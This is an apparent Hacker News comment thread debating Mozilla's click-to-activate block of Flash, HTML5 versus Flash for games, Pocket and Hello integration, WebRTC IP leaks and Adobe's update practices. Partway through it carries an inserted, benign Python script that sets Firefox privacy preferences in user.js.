To be clear, by "blocked" Flash we really mean enforced click-to-activate. User choice is always a #1 priority at Mozilla.
We regularly block vulnerable plugins. What made this block different was that we did it before Adobe made an update available. Now that Adobe has released an update, it is no longer true that every version of Flash Player is blocked in Firefox.
However, we're glad to see the conversation this has sparked. Personally I align with Alex Stamos regarding Flash, in the thinking that a formal EOL would be great.
I'd also like to use this space to make a shameless plug for Shumway, a project set on building a faithful and efficient renderer for the SWF file format without native code assistance. Ending Flash doesn't need to mean an end for Flash media. http://www.areweflashyet.com/shumway/
Technology should be replaced by better technology. To give you some background: I've written games for all kinds of platforms: PocketPC, Windows Mobile, (Desktop) Windows, Linux, OS X, Flash (AS3), HipTop, J2ME devices and some smaller proprietary devices.
Some of those platforms offer write once, run everywhere. On other platforms every device has its own quirks and you have to test on every device and implement workarounds.
You might not like Flash, but it is great at running on every platform/browser with the same code base. If you test it on one platform, it runs on all others. (Adobe is also very good at keeping it backwards compatible)
Now, I ask you, what's the alternative for Flash? Does HTML5 offer write once, runs the same on every platform/browser(version!)? No it doesn't, and it never will. Even simple HTML pages are full of browser checking hacks.
Now, if you can offer a programming platform where the games I develop on, run exactly the same on every browser, on every platform, I have no problem killing Flash. But let's be honest here, only plugins can guarantee such a thing.
As to Alex Stamos, the top games on Facebook are all Flash. You know why? Because developers don't have to worry whether or not those games will run inside the user's browser. Because once Flash is installed, they will run without issues. HTML5? No such guarantee.
So before you declare EOL, please have a proper alternative, where I don't have to pull my hair and cry all night because browser X on platform Y version Z seems to break the end boss of level 5 in my game because its implementation slightly differs from all the rest.
While I do understand where you are coming from - it can be more convenient to target a single implementation - the fact is that Flash has not been what you describe, for a while now. Flash officially announced it would no longer support Linux, and Flash is not usable in most mobile browsers either, for example.
Even plugins can't really get you what you want here. Yes, HTML5 has limitations, as you described, but plugins aren't the solution. HTML5 is closer, and moving in the right direction at least.
Mobile doesn't need browser plugins, because it has apps. AS3 compiles to Android and iOS, just as it should. So I agree with Adobe that mobile doesn't need to support Flash. BTW, the same AS3 codebase for Flash runs as mobile apps. Do the HTML5 games support all versions of all browsers on the most popular mobile devices? Not on mine at least :(.
One codebase, runs everywhere, Flash in the browser, apps on mobile devices. Personally never had an issue with it.
Although I must agree with you that it's sad Adobe dropped Linux support.
koonsolo is right on with all his points. Flash is better than HTML5 all around.
Though personally I can understand why Adobe dropped support for linux, the market is just too small. Even though this community probably has a higher percentage of linux users than just about anywhere.
Yeah and this community is made up by mostly developers. To turn your back on developers is shooting yourself in your own foot. However, that is not what adobe are doing. They have signalled their intention to sunset flash themselves for a long time.
Plugins allow you to more easily experiment with different distribution methods, languages, etc. Flash, Unity, the JVM, etc, all have areas that they're much better at, such as tooling support, language support, etc. Sticking everything in a monoculture is a terrible idea.
Flash isn't part of the Web. It's not vendor neutral.
If Adobe decides to deprioritise a platform that means the users of that platform will experience less support in terms of bug fixes, performance and security. If Adobe decides not to support a platform period that means users of that platform are left without a means to access Flash content.
If you are a user this is unacceptable. More importantly these things have already happened.
I fully agree with you. But like I said, if technology is replaced, it should be replaced by better technology.
For websites, HTML5 offers enough to be considered a proper alternative. Yes, I probably dislike Flash websites as much as you do.
But for games, HTML5 just doesn't cut it compared to Flash (or yes, even Java applets as someone else mentioned ;)). And the sad truth is that by design, each browser vendor will have its own implementation with its own quirks.
(I seem to be getting a lot of down-votes on my original post, although I don't think I said anything incorrect)
I think the issue is with the 'better technology' bit. Flash simply isn't a better technology than HTML5. They are, as they say, a land of contrasts, each with their own strengths and weaknesses. But where HTML5 is moving forward, steadily improving, Flash is actually getting much worse with time, supporting an ever-smaller proportion of the net, and doing so with less stability and security.
The Web is better, it's vendor neutral and not dependent on the whims of Adobe. Sure it may not be convenient for developers but as a user it's very convenient.
> If Adobe decides to deprioritise a platform that means the users of that platform will experience less support in terms of bug fixes, performance and security.
Case in point, OSX. Wasn't until Flash v11 that OSX had hardware-assisted playback.
Hi, while I got your point and mostly I agree with you, I just have a question.
Now when WebGL is widely adopted why you can create your games using that technology? Or even compile your C/C++ games with asm.js. I saw very nice demos in the past.
For simple 2D games (like most of the Flash games), I saw very nice Flash-friendly libraries like Phaser[0] (based on Pixi.js).
I went to that phaser.io url, and when clicking on the examples, I see a background with nothing on it. I don't know if it has to show something animated or not. I pushed the 'Run code' rocket button, but still nothing shows. How do I make it start?
This is in Firefox 39.0, Windows.
Let's try IE, I'm curious. I need to click 'Show all content' at the bottom, and after that I see the animations. I tried the 'virtual joystick dpad' example and it works. But the cutouts of the joypads seem off. You can see their rectangular cutout, got the impression transparency isn't working properly, but also possible it was designed that way. But I don't think so because the screenshot of that example doesn't have it, so I guess it is a platform issue.
One more go, my iPhone: It doesn't scale properly, way too big for my screen. Can't zoom out or scroll. But the animations seem to run in the corner of the screen that I can see. Same transparency issue as on IE.
And let's be honest here, those examples are pretty basic and simple.
Do you have any interest in organizing an effort, along with Facebook's Alex Stamos and other folks, to plan a formal EOL for Flash? Of course, the steps Mozilla and others have taken help, but perhaps a more organized movement could get other thought and market leaders on board, trigger higher rates of HTML5 adoption and foster the bits of remaining innovation that are needed to fully replace Flash on the web.
Also, does Firefox plan to address the concerns brought up about Hello, and, more importantly, Pocket?
To avoid inflaming the situation, I have deleted my erroneous (sibling) comment after @aroch's reply. I was not aware that Pocket sent no data without opting in.
> The choice is to install it by default and make users opt-out, giving the uninformed users' data to Pocket (and thus their "partners")?
Except no data is sent to Pocket unless you actually opt-in to the service by signing up. Unless you login to Pocket the plugin and all its communication code is inactive... It is fine to not like the integration but spreading FUD is annoying.
Data doesn't go to pocket until you start using it, and even then, you have to click through a few pages to get there. Pages which make it abundantly obvious that it's a third party service.
Mozilla did user testing before integration and found that people do want it. Remember that techies complaining on HN doesn't mean that the majority doesn't like it.
It's not different from the privacy implications of having Google/Yahoo as a default search provider. It's a nice feature that (very visibly) uses a third party service instead of being part of Firefox Accounts.
"Mozilla did user testing before integration and found that people do want it. Remember that techies complaining on HN doesn't mean that the majority doesn't like it."
I'm really not convinced by this as an argument. People might like all sorts of harmful things, once they see them. And the fact that people might want something that provides the functionality that Pocket provides, or something like it, doesn't mean that using Pocket specifically is a good idea.
This is an argument against "users didn't like it", not in itself a reason to use Pocket. Though if you couple this with the fact that Pocket integration isn't much different from search does help its case.
I was advocating for this yesterday in /r/sysadmin and this morning it was a pleasant surprise to hear that this actually happened. I imagine you're getting all sorts of complaints from advertisers and others, but it's the right move. The web is simply dangerous and having an unaccountable closed source binary happily running anything served to it is just crazy.
I'd love it if you kept it like this and implemented a flash whitelist function. Flash needs to be treated like Java: it's legacy tech that should be used only via whitelisting. Google is too embedded into the marketing and advertising world to ever consider doing this in Chrome. It's really up to you guys, per usual, to save the web.
Removing registration on Hello servers and WebRTC altogether is not stupid if you give a shit about your privacy, look at the leaks WebRTC provides, local IPs which are great for fingerprinting, real IPs from behind VPN, etc. It's one big gaping privacy nightmare so far, so it's pretty reasonable to have it disabled, until this gets sorted out at least.
Fortunately it can be toggled off in about:config easily.
Set loop.enabled = false to disable hello, set media.peerconnection.enabled = false to disable WebRTC. If you don't want pocket, set browser.pocket.enabled = false.
You can even make yourself one big user.js file to fix the bad ideas that have been added to Firefox lately. Mozilla still has a good thing going for them, and that is user choice. However stupid the defaults get.
Right. It's like the "just hit delete" line from spammers, and the invisible "x" boxes to reject "shared" posts in Facebook.
Firefox doesn't even predefine some of the things in "about:config" that need to be set to turn off some of these undesirable features.
There's IceCat, a GNU fork of Firefox without all the proprietary extensions.[1] It may start getting more traction as Mozilla puts more junk in the browser.
It's a real pain, but they want the less sophisticated users to be able to take advantage of all the latest stuff and if Chrome or IE is shipping with it enabled, they have to compete. Well, that explains WebRTC at least. As for the other stuff...
I'm a Pocket user, but I have no idea why that needed to be integrated into the browser, seems like an insane decision to me. I hope they got a good pay day out of that.
Same as the history based advertising tiles. Sure, it's checked locally, it still seems creepy and annoying... but again, browser.newtabpage.enhanced = false.
Unless we lose this level of user choice, I don't see a better alternative. It would be nice if someone would ship some tool to automatically update a user.js file, however, I think many of us have different opinions about what feature we do and do not want enabled in our browsers.
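Added example, not part of the thread and not Mozilla code: a small Python sketch of the kind of tool wished for above, which idempotently merges the four preferences named in these comments (loop.enabled, media.peerconnection.enabled, browser.pocket.enabled, browser.newtabpage.enhanced) into a profile's user.js while leaving every other line alone. The function names and the sample file contents are constructed for illustration; pass your own dictionary if your opinions on the defaults differ.

```python
import re
from pathlib import Path

# Preferences and "off" values exactly as named in the comments above.
HARDENED_PREFS = {
    "loop.enabled": False,                  # Firefox Hello
    "media.peerconnection.enabled": False,  # WebRTC
    "browser.pocket.enabled": False,        # Pocket integration
    "browser.newtabpage.enhanced": False,   # enhanced new-tab tiles
}

# Matches one user_pref("name", value); line, optionally followed by a // comment.
_PREF_RE = re.compile(
    r'^\s*user_pref\(\s*"([^"]+)"\s*,\s*(.+?)\s*\)\s*;\s*(?://.*)?$'
)

# Constructed sample of an existing user.js (not taken from any real profile).
SAMPLE = (
    "// constructed sample user.js\n"
    'user_pref("browser.startup.homepage", "about:blank");\n'
    'user_pref("media.peerconnection.enabled", true);\n'
    'user_pref("loop.enabled", false);\n'
)


def format_value(value):
    """Render a Python value as a user.js literal."""
    if isinstance(value, bool):  # bool first: bool is a subclass of int
        return "true" if value else "false"
    if isinstance(value, int):
        return str(value)
    escaped = str(value).replace("\\", "\\\\").replace('"', '\\"')
    return f'"{escaped}"'


def format_pref(name, value):
    return f'user_pref("{name}", {format_value(value)});'


def merge_user_js(text, wanted):
    """Return (new_text, changes) with every pref in `wanted` set exactly once.

    Lines for other prefs, comments and blank lines are preserved verbatim.
    """
    remaining = dict(wanted)
    seen, out, changes = set(), [], []
    for line in text.splitlines():
        match = _PREF_RE.match(line)
        if not match or match.group(1) not in wanted:
            out.append(line)
            continue
        name, current = match.group(1), match.group(2)
        if name in seen:
            # user.js is applied top to bottom, so a later duplicate would
            # silently override the value we just enforced: drop it.
            changes.append((name, "duplicate removed"))
            continue
        seen.add(name)
        remaining.pop(name, None)
        desired = format_value(wanted[name])
        if current == desired:
            out.append(line)
        else:
            out.append(format_pref(name, wanted[name]))
            changes.append((name, f"{current} -> {desired}"))
    for name, value in remaining.items():
        out.append(format_pref(name, value))
        changes.append((name, f"added as {format_value(value)}"))
    return "\n".join(out) + "\n", changes


def update_user_js(path, wanted=HARDENED_PREFS):
    """Apply merge_user_js to the file at `path`, creating it if missing."""
    target = Path(path)
    old = target.read_text(encoding="utf-8") if target.exists() else ""
    new, changes = merge_user_js(old, wanted)
    if new != old:
        target.write_text(new, encoding="utf-8")
    return changes


if __name__ == "__main__":
    merged, report = merge_user_js(SAMPLE, HARDENED_PREFS)
    print(merged, end="")
    for name, what in report:
        print(f"# {name}: {what}")
```

Firefox reads user.js from the profile directory at startup, so close the browser before running update_user_js against a real profile and restart it afterwards.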
Off by default lets everyone choose to turn it on if they're interested. It also might clue in Mozilla's devs that if they want people to turn it on, a setting in about:config isn't the only place you should be putting the button.
Off by default is neither removing user choice, nor is it preventing Mozilla from saying they ship with feature X. It is the right way to present it.
> Off by default lets everyone choose to turn it on if they're interested.
It lets more sophisticated users choose. Less sophisticated users however will more likely switch to a different browser the moment a site doesn't work before poking through settings.
I think a better way than a separate setting would be to go in the direction of many software firewalls and present it to the user as a choice when an application requests it as many browsers currently do with the location APIs. This would provide individual domain-level control over what permissions sites are granted by you. I don't know why this sort of policy seems to be restricted only to the location APIs...
I agree with a lot of this, but not turning off WebRTC in general. Certainly you should turn it off (or force TURN only) if you're trying to hide your IP behind a VPN. But IPv6 already causes you to lose the same amount of privacy as exposing your IPv4 address behind a NAT, so it seems somewhat of a lost cause.
I still think WebRTC enabling peer to peer connections is better than running all of your data through a third party server.
> But IPv6 already causes you to lose the same amount of privacy as exposing your IPv4 address behind a NAT, so it seems somewhat of a lost cause.
Extremely few people have active IPv6, it seems unlikely to catch on now. In addition to that, IPv6 privacy extensions may allow a solution to this problem for many users, but if their link local IPs are also published that may lead to further trouble, depending on configuration. Remember though, this leaks all interface IPs, I have many virtual machines installed with their own network adapters added to my system, VPN adapters, etc which also leaks data as all of those adapters will have v6LL IPs on them even if they're not in use.
Additionally, this issue is already actively being used for fingerprinting. Not some exploit of tomorrow. There was a New York Times advertiser caught doing it a few days ago.
> I still think WebRTC enabling peer to peer connections is better than running all of your data through a third party server.
Yeah, which is why I encourage disabling it completely. Until either they fix the privacy issues or the value of using some WebRTC application appears to trump them to you.
IPV6 isn't going anywhere: IPV4 exhaustion is a real concern and with the internet / internet of things growing, the only place to grow is really the IPV6 space. NAT only delayed the inevitable.
Yeah, I know, many OSes do already prefer it by default. I see more pushes for CGN than I do for IPv6 as a solution to IPv4 depletion though, it just seems dead in the water, in my country at least. Maybe your ISPs are better, but no locally available ISP will offer me native v6, it's either real v4 or CGN v4.
>Extremely few people have active IPv6, it seems unlikely to catch on now.
Except that over 20% of the United States has IPv6 connectivity. In fact, you might be using it without knowing (most mobile providers have it now, in fact some use IPv6->IPv4 translation methods) [1].
>Remember though, this leaks all interface IPs
Does it? Maybe you should file a bug so that only routable interfaces and non-LL IPs are used. This does seem like a problem.
> Except that over 20% of the United States has IPv6 connectivity.
The entire rest of the world has near-zero, just look at your own link. I'm in Canada and we have 0.55% here. No local ISP will offer it to me, and the one that did withdrew it completely last year. So perhaps I'm just slighted. There are a few other countries with 5%+ but it still makes up only a very small percentage of internet users. To top it off, while there has been some IPv6 adoption in the US, CGN has also caught on pretty heavily all over the world and seems to be, sadly, the solution most ISPs will actually go with for the near term at least.
> Does it? Maybe you should file a bug so that only routable interfaces and non-LL IPs are used. This does seem like a problem.
https://diafygi.github.io/webrtc-ips/ is able to immediately reveal all the VM interfaces on my system even with no VMs using them. I suspect this is done so that faster routes may be established, but it is indeed a major problem for anyone who doesn't like fingerprinting.
Oh please don't remove pocket, this is one of the awesome feature of Firefox along with Tree Style Tab (and if it was just me I would add Tree Style Tab by default as well)
(And of course I go against the public opinion here on HN, but I wonder how many people did actually use Pocket before trashing it?)
It's debatable but I think something like pocket is fundamental to a 2015 browser experience. The bookmarking system has been bad since its beginnings.
These need to be disabled by default, and the steps you list should be taken by people who want to enable them.
If a masochistic user wants to navigate the labyrinth of dark patterns meant to confuse them into not understanding that the "Additional tools and features" category is also the "completely disabled features that run nothing in the background" category (why would anyone think that, ever?), then they can go ahead and do it. If these things are so great, then I'm sure users would be happy to put that extra work into enabling them. After all, it's 3 simple intuitive steps!
For some reason, I keep having to do that - it doesn't stick. And every version brings more unwanted toolbar buttons I need to remove. I'm seriously considering looking into building a version of Firefox with them patched out altogether.
Just out of curiosity, how will removing Pocket integration and Hello (a thin UI over WebRTC) personally? Both are lazy-loaded, so the only bloat they add is "visual bloat". This behavior is seriously disappointing from the Firefox community.
I've been using Pocket since it was Read It Later and I was pleased to see it integrated into the browser. Mozilla is working on a Reader mode[0] but it does not seem to be ready for public consumption yet (despite landing in 2012). Most people don't even know it exists, and it obviously does not save it for later (unless you bookmark it). The implementation is open-source (MPL license), although Pocket itself is proprietary. Hotword detection is not absolutely necessary for browser functionality, yet I hear no chorus of complaints from Chrome users. Should Mozilla be prohibited from partnering with proprietary third-parties whether or not it benefits their users?
Hello is even less of an argument. Firefox Hello is a simple Javascript UI for the existing WebRTC spec supported by Firefox, Chrome, and Opera[1]. It allows people to communicate without having to set up accounts, sign-in somewhere, and works against the platform lock-in of proprietary services such as Facetime, Hangouts, and Skype. If it's disabled by default, the service becomes useless. My parents shouldn't have to enable it in about:config for me to talk to them, nor should they have to download another plugin to use a technology built-in to the browser. I understand the security implications[2] in IP leakage[3], but I don't see a simple fix that doesn't neuter the functionality (although this comes close[4]). W3C has stated their position on fingerprinting[5], but at least Mozilla is actively working on the issue.
I noticed this behavior when I fired up an older Mac I hadn't used in a year or so, it was refreshing that Flash always required click-to-activate, and I made this the setting on all my machines a while back and started suggesting to my friends too.
Some websites' videos don't work as well, they have JS or CSS that interfere, or assume that you don't have flash installed, or retaliate as if you are an ad blocker, so I'm glad to see this is becoming more widespread, those problems may be fixed.
Is Shumway a possible replacement for Scratch 2's flash implementation? They seem to think that there are some flash things that just can't be done without flash:
> Unimplementable Features on iOS: Image effects for whirl, fisheye, mosaic, and pixelate. Sound and video input for loudness, video motion, and touching colors from the video.
The next time this happens can you please disable it entirely?
The things on my site (video, some ads) that use flash will fall back nicely to HTML5 if Flash is disabled, as will most of the web. Click to activate is the worst of both worlds.
That's completely technically meaningless without EOLing NPAPI, and Google's currently the only people brave enough to do that. Firefox's EME implementation is strictly less of a threat to your privacy than the current status quo, by design.
NPAPI has its own privacy and security and stability reasons to meet a swift doom, even independent of the DRM question.
The web has become an application delivery platform, like it or not. While there are arguments against forcing DRM on consumers, for video production workflows and project management, DRM is a necessity. I'm assuming you've worked with private Github repos with access control, right? Same idea.
How are private Github repositories using the same idea? Normal access controls are just implemented at the data source, limiting read (or write) there. DRM is implemented in the hardware of the user so that some programs that the user uses can access the data, but not those programs fully under control of the user.
If you can access a Github repository then you can do so with software fully under your control (and hence make copies of the data as you wish). Did I miss something?
Okay, so maybe not the best analogy. Contact access expiration via git is far more primitive, sure - if you have access today you can clone a private project and have a snapshot of it in that state, once your access rights are revoked you just won't see any further work. Unfortunately, this 'freedom' leads to far more problems than it solves - horrible corporate bureaucracies around where you may or may not check code out to, remote wipe capability, contractor laptops, etc. There are many real-world use cases where, in order to accomplish the completion of a project, you need to provide an external resource with access to sensitive data for a limited amount of time. Think manufacturing, commercial video production, medical data, game development - pretty much anything where you outsource a specific phase of product development to a third party. Without DRM, these workflows are limited to online-only, where assets are streamed and can't be stored locally. This is a dealbreaker when, for example, you need to send part specs to a manufacturer in the middle of China.
> There are many real-world use cases where, in order to accomplish the completion of a project, you need to provide an external resource with access to sensitive data for a limited amount of time.
Well, then there are many real world use cases that are not doable in our version of reality, where data can be copied ad infinitum, and where you NEED to show the end user unencrypted data.
A political necessity, certainly not a technical one. The default state of content is open, restricting it should be seen for the positive (read: affirmatively taken) action that it is.
"To prevent these add-ons from running, click Restart Firefox."
Why doesn't the dialog box have that same explanation? Did you (mozilla) think the two button options "Restart Later" and "Restart Firefox" won't confuse people?
I second this! Tree Style Tab is one of the few addons that I cannot live without. Heck, it is one of the reasons why Firefox is my primary browser.
This feature should be made native and the original developer should be rewarded somehow for his efforts.
One slightly annoying thing I found right now is that if I have a plugin set as disabled in about:addons, it will not show up on the update checker found in the top link.
The (unprivileged) Plugin Check website can't detect disabled plugins because they don't show up in navigator.plugins. Ideally, Plugin Check should be an automatic check built into Firefox. The advantage of the Plugin Check website is that it works in any browser.
Couldn't you preserve the nice trait of working in any browser by having the browser load it with a hash-fragment containing a list of disabled plugins to add to navigator.plugins?
I don't know that it's particularly faster than what can/could be accomplished with svg + JavaScript ...
I think most of the speed as a plugin vs native html/svg/js is that you don't have the whole DOM to deal with (including reflows, etc), and that their ActionScript is a much smaller subset of a language than JS in the browser, AS3 changed things a bit though. Today with canvas and an audio api that mostly works, you can get the same.
What I really wish is that Adobe would create Flash-level tooling with outputs for HTML/canvas/js/web-audio and video.
The tooling was amazing. I used to do a ton of Flash development back in the day, and the ability to seamlessly create the UI and backend code is still light years ahead of the cross-browser nightmare of creating HTML5 apps. I think Adobe has tried to achieve the same level of functionality with other tools over the years (Adobe Edge Suite), but it never really made it to the same level as web application development in Flash.
actionscript (the flash programming language) is pretty much the same as javascript, the main reason why flash is often a lot faster than html+js things in a browser is it is not constrained to a slow, broken DOM for building uis.
I think the answer is probably Tamarin[1] which started life as Flash's ActionScript engine and has since been donated to Mozilla. The Flash Player has also had direct GPU support for graphics and video for many years.
So retrofitting arbitrary layouts onto a ~text document specific one is that much an error. In hindsight I find it fantastic how web pages became the basis infrastructure of all this UX reinvention.
For what it's worth, the shumway racing AS3 demo appeared to work but froze all input like closing or switching tabs for me and I had to kill it with task manager. Windows 8.1, Firefox 39.0.
Why isn't Mozilla spending more time to ensure Firefox is using all of the security resources that the OS gives it? Things like ASLR still aren't enabled by default, let alone plugin sandboxing like what exists in Chrome. While Shumway would be nice, having a reliable, secure way to hook into native code would be a lot nicer.
... alternatives like Google's closed-source Chrome, Apple's closed-source and behind-the-times Safari, and Internet Explorer???
Are you trolling? Are you attempting to discredit the anti-Firefox campaign by trying to say that running Internet Explorer is a reasonable alternative for your Macbook, and that a kernel panic from non-kernel software is somehow the software's fault, not the kernel's??
Job done. No more Mozilla annoyances between me and the content I wish to access. And yes, it was an annoyance because the link to "check for updates" in your message would not get me anywhere. That was a flaw in your strategy that I now suspect was deliberate. I really can't respect engineered annoyances that align with agendas rather than good UX.
I like Flash when it's done well. Raw performance and efficiency is one of the things I like about it. The powerful multimedia handling of everything from audio to video cannot be matched by HTML5. I'm an HTML/CSS/JS dev for my living for 20 years, that's how I know this to be true.
HTML5 video is cute. But it doesn't cut the mustard in all circumstances.
360 video, VR, and many other things will come along that are too much for web technologies to handle. Flash serves a useful purpose in allowing websites to cater to the most demanding cutting edge tech and content without needing the Firefoxes and Chromes of the world to keep up.
"closed source"; "battery drain"; "plugins are just bad".... oh cry me a river.
Holy shit. Flash has over 34 CVEs in one week—and only because a prominent organization that was sitting on a bunch of them got hacked—and you call mozilla taking steps to protect the security and integrity of their customers an "engineered annoyance"?
Performance is better than javascript. But then, who here has done a side by side comparison?
A: Built something in Flash
B: Built the exact same thing in JS and measured their performance side by side in the page, and on separate pages.
Even sliding an image - such a simple thing. Make it whoosh to the left. Guess what? Flash will whoosh it quicker and smoother on browsers with Flash installed.
I love JS, it's cool for web stuff and data fetching and sorting for a huge percentage of the internet. I had a great time with it doing multiple AJAX calls and sorting for a single page thing on a heavy traffic media site. Love the whole promises thing for sorting out those pesky asynchronous dinguses. Yep. HTML5 does indeed rock. Really love modern CSS too. Hate grids though but each to their own. I don't say "grids should die".
JS/HTML is not superman. If you want superman on your webpage, you need something more, such as a plugin.
Unity plugin. I might use that next. I really don't want to be fighting people about the value of plugins, even if that value and scope is reduced from what it is a few years ago, it's still there. I want to make games, and what is clear to me after trying an HTML game is that..... it's pretty much a joke. HTML5 games in 2015 are, a joke.
How dare anyone at Firefox or Facebook put forward an EOL for someone else's technology. EOL your own stuff, not someone else's. Bloody rude if you ask me.
"Flash should die because it has equal performance to native iOS apps". That's what I read between the lines in Jobs' letter. I like Steve Jobs, but he was a player. A chess player. We respect chess players, but they won't hesitate to knife you in-game.
If Flash dies, it's the hate that killed it more than any sensible reflection on the technologies we have available and how they can best be used.
If nothing else, hope I've added more comedy for you.
And yet, my system is squeaky clean, and has been for years.
And shock horror, I don't even have a virus protection program installed. I install one every 12 months or so. Actually I install a few at one time to be thorough. Do a complete scan, and of course it comes up 100% clean, then I uninstall all of them and get on with work.
Continue being paranoid and using up CPU cycles to serve your paranoia while I enjoy a lightning fast workstation. The choice is yours. Choice is good.
When I was a student, I didn't buy games. I downloaded them. Got malware and worse even with virus protection. I buy games, since about 2002 I just buy the software I want. No virus/malware issues here.
Bugs are always bad (and security bugs even more so) - but I've always felt that Flash gets a disproportional amount of hate/hype in the media. To some degree it should be normal that the more widespread a technology is - the more it gets targeted for security exploits.
If you run the popular browsers/plugins against the National Vulnerability Database, you'd get the following results (as of January 2014):
- Internet Explorer 366 total vulnerability issues (314 high severity)
- Google Chrome 235 total vulnerability issues (154 high severity)
- Adobe Flash 207 total vulnerability issues (169 high severity)
- Mozilla Firefox 190 total vulnerability issues (86 high severity)
- Oracle Java 161 total vulnerability issues (69 high severity)
I have a lot of experience of end users and they are forever telling me that they get so many different "Update this", "Update that" windows that they can no longer distinguish real from fake. Some of them have been tricked by fake web site pop-ups as a result, others ignore legitimate update messages. I do not blame them.
Internet Explorer and Google Chrome get updated in a way that most end users find to be simple to understand, particularly with Chrome. Firefox is also quite good in this regard. All of them are reliable - it is rare, IME, to come across a Windows Update, Firefox or Chrome instance which is silently failing to update. Or not even bothering to prompt to update.
Flash, however often I install it, just doesn't seem to auto-update reliably. Quite often it only does so after a user log on/reboot, which doesn't happen much in the days of standby. Even on brand new, fresh Windows installs (so we know the OS/Flash isn't broken), I test Flash from time to time and it just doesn't prompt to update at all on some occasions. This is what makes Adobe's poor track record exponentially worse - that their software update mechanism is crap at best.
I was gobsmacked when Microsoft declared they were going to start updating Flash via Windows Update. Gobsmacked and so very relieved. It felt like they'd walked into Adobe's office, grabbed their fire extinguishers and told them "You are so useless that when there's a fire, WE will come and put it out, since you don't seem able to. We are sick of our offices getting burned down because of your idle incompetence."
I won't even address Oracle's Java. Bundling malware with their updater is tantamount to crime.
That's the real reason they don't want an auto-update. Google pays them a lot for bundling Chrome (I think it's around $1 per install). They keep breaking the auto-update on purpose so that they can make a ton of money by bundling other software. Same with Java updates.
Shock, the only browser that still uses NPAPI is the descendant of the one that invented it!
Really, at this point I think Mozilla is more interested in just getting rid of plugins than trying to implement an alternative to NPAPI - why put all the effort in to support something like PPAPI when plugins should be dead within the decade anyway?
Yes! I admin my parents' computers and after trying to explain which 'update' windows are genuine, I realised that there just isn't a good way to tell them apart.
Silent auto-updates are really the right way to go for non-techies. Even the post-upgrade 'announcement' popups are confusing. For instance, I've installed Ghostery on their computers and the 'ghostery has been updated' popup is just confusing for them, leading to confusion and phone calls to me.
Flash also doesn't seem to auto-update for them, despite me setting it up. I don't understand it either, as they turn off & on the machine regularly. Why can't Adobe get this right?
Flash also comes with McAfee (or some other bundleware). I wouldn't be surprised if the reason why they haven't made a proper auto-updater is because of that. That they'd miss out on those minuscule profits they get from that.
Yeah, I've been wondering why Adobe sticks to a "visit our website and manually download the new version" update model in this day and age. I think you found the answer.
If you keep ignoring the update prompt, Flash will quietly update itself after 45 days. That's long enough for every interested party to pwn your machine.
This right here pretty much kills any sympathy I had for Adobe in this matter. They sit on their hands for far too long when vulns are announced, and when they do get updates out, they use a completely backwards and useless update model in the name of extracting a few pennies per user.
I have had multiple non-technical friends, in one case on a fresh install I'd done myself, run into the Flash update window simply showing a gray background that never does anything.
The best solution for this, from Adobe's own forum? Find the corporate-deployment version, download that (ignoring the messages that say it isn't what you want) and run it. This works flawlessly, but even less automatically.
Both the Flash and Java updates almost feel like "Pay Attention To Me!" Just like all those discount cards that exist in part so you carry around a fetish with the corporate logo.
> I have a lot of experience of end users and they are forever telling me that they get so many different "Update this", "Update that" windows that they can no longer distinguish real from fake. Some of them have been tricked by fake web site pop-ups as a result, others ignore legitimate update messages. I do not blame them.
One solution to this is to use AdBlock Plus. When a site permits adverts that threaten a computer's security, it is time to add it to the blocklist.
It seems to work ok if you install it for them - I now tend to do that for non tech users who I help out. Though usually uBlock rather than AdBlock Plus. It's scary if you go to a download site these days how many fake download buttons there are near the real one if you don't do something like that.
One notable exception is Major Geeks. However, it's important to donate them a few bucks for staff and bandwidth because they are giving up a ton of money by not bundling crapware and confusing people.
http://www.majorgeeks.com/mg/topdownloads/index.html
Remote code execution exploits were found in Firefox at least once per month during the first half of 2015. The only reason we didn't hear about these cataclysmic exploits is because it wasn't Flash.
Hackers search for remote code execution exploits in Flash first and foremost because they know a successful Flash exploit will reach the highest number of targets (90% or more on the desktop) whereas only 44% of desktop machines are running Chrome and 15% are running Firefox.
Hackers seeking out and exploiting RCE bugs in Firefox is unheard of for the same reason malware targeting Macs has been virtually unheard of over the past decade: It's not that OS X is more secure; it's simply that Windows is a more lucrative target.
Mozilla seems to take anywhere from 1 to 3 months to fix these severe bugs. Adobe takes days.
Source for this complete and utter FUD? Certainly not the links you gave:
Jan 11, 2015: Originally reported to Mozilla as a low-severity DoS, which turned out to be already patched in trunk
Jan 13, 2015: Firefox 35.0 shipped with patch
It's hard to get dates out of the others because the bugs are still hidden, but the "fixed in" is often a security fix update after a release, which means it can't possibly have been > 6 weeks.
> If you run the popular browsers/plugins against the National Vulnerability Database...
That's misusing statistics, you can't determine how secure something is by just summing up the number of vulnerabilities - equally weighing/comparing browsers with a plugin etc.
By the way, Apple's opinion on Flash in 2010:
Third, there’s reliability, security and performance.
Symantec recently highlighted Flash for having one of the worst security records in 2009. We also know first hand that Flash is the number one reason Macs crash. We have been working with Adobe to fix these problems, but they have persisted for several years now. We don’t want to reduce the reliability and security of our iPhones, iPods and iPads by adding Flash.
Also, considering the track record of Flash on Android, your opinion is not supported by historical fact. It is very clear that Adobe is not on the ball to anyone who pays attention.
Sure, and one of those business reasons is keeping bloated, buggy software that is ill-suited to mobile devices away from their phone's user experience.
Flash was never "blocked" on Apple devices. Rather, Safari on iOS simply doesn't support plugins. You can't install Java, Silverlight, or Unity 3D plugins either.
So Flash is second in terms of number of high severity bugs and first in terms of the percentage of bugs that are high severity, only being beaten by Internet Explorer. By your evidence the hate for Flash is quite justifiable.
Flash bugs are more important because they are cross-browser. I will still use Flash though on older computers, because it needs less resources for video.
Yes but Flash vulnerabilities are incremental vulnerabilities.
So just counting high severity vulnerabilities, the chart is
IE: 314. IE with Flash: 483.
Chrome: 154. Chrome with Flash: 323.
Firefox: 86. Firefox with Flash: 255.
And of course, you can add a third column for Java and a fourth column for browser with Flash and Java.
I have no idea what their bugs-per-line-of-code are, perhaps they have the finest code on the planet. But from a surface area perspective, installing Flash makes you more vulnerable, period. And it really is not necessary, whereas it’s not like you can browse the web in pure Flash and not install a browser.
>But from a surface area perspective, installing Flash makes you more vulnerable, period.
So does turning on Javascript. Yet the popular opinion these days is that disabling Javascript makes you a luddite. Mozilla even hid the option for it in Firefox.
Yes, but Flash alone doubles the attack vector of a browser - that's nothing to be sneezed at. I think it's particularly poignant when you look at the high severity metric.
